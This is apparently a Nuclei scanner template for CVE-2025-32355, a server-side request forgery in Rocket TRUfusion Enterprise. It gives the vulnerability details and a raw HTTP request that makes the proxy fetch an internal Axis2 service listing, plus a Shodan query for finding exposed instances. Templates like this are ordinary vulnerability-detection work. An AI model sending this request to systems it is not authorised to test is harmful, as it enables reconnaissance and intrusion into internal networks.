Rocket TRUfusion Enterprise - Server Side Request Forgery

id: CVE-2025-32355

info:
  name: Rocket TRUfusion Enterprise - Server Side Request Forgery
  author: princechaddha,rcesecurity,DhiyaneshDk
  severity: high
  description: |
    Rocket TRUfusion Enterprise through 7.10.4.0 uses a reverse proxy to handle incoming connections. However, the proxy is misconfigured in a way that allows specifying absolute URLs in the HTTP request line, causing the proxy to load the given resource.
  impact: |
    Attackers can make the proxy load arbitrary resources, potentially leading to information disclosure or further attacks.
  remediation: |
    Update to the latest version with proxy configuration fixes.
  reference:
    - https://www.rcesecurity.com/2026/02/when-audits-fail-from-pre-auth-ssrf-to-rce-in-trufusion-enterprise/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32355
  metadata:
    verified: true
    max-request: 1
    shodan-query: 'html:"TRUfusion Enterprise"'
  tags: cve,cve2025,rocket,trufusion,ssrf,vkev

http:
  - raw:
      - |+
        GET http://127.0.0.1:8080/axis2/services/listServices HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.5
        Connection: keep-alive

    unsafe: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Available services"
          - "Service Description"
        condition: or

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d22c369adcde5e8a0233a677059527b3e17ad15df2348701f90a7b3f6d8337a8022005500565a64099330d8511b9ff4e3a0eec815cb801c8a92d3a57536d31e540d2:922c64590222798bb761d5b6d8e72950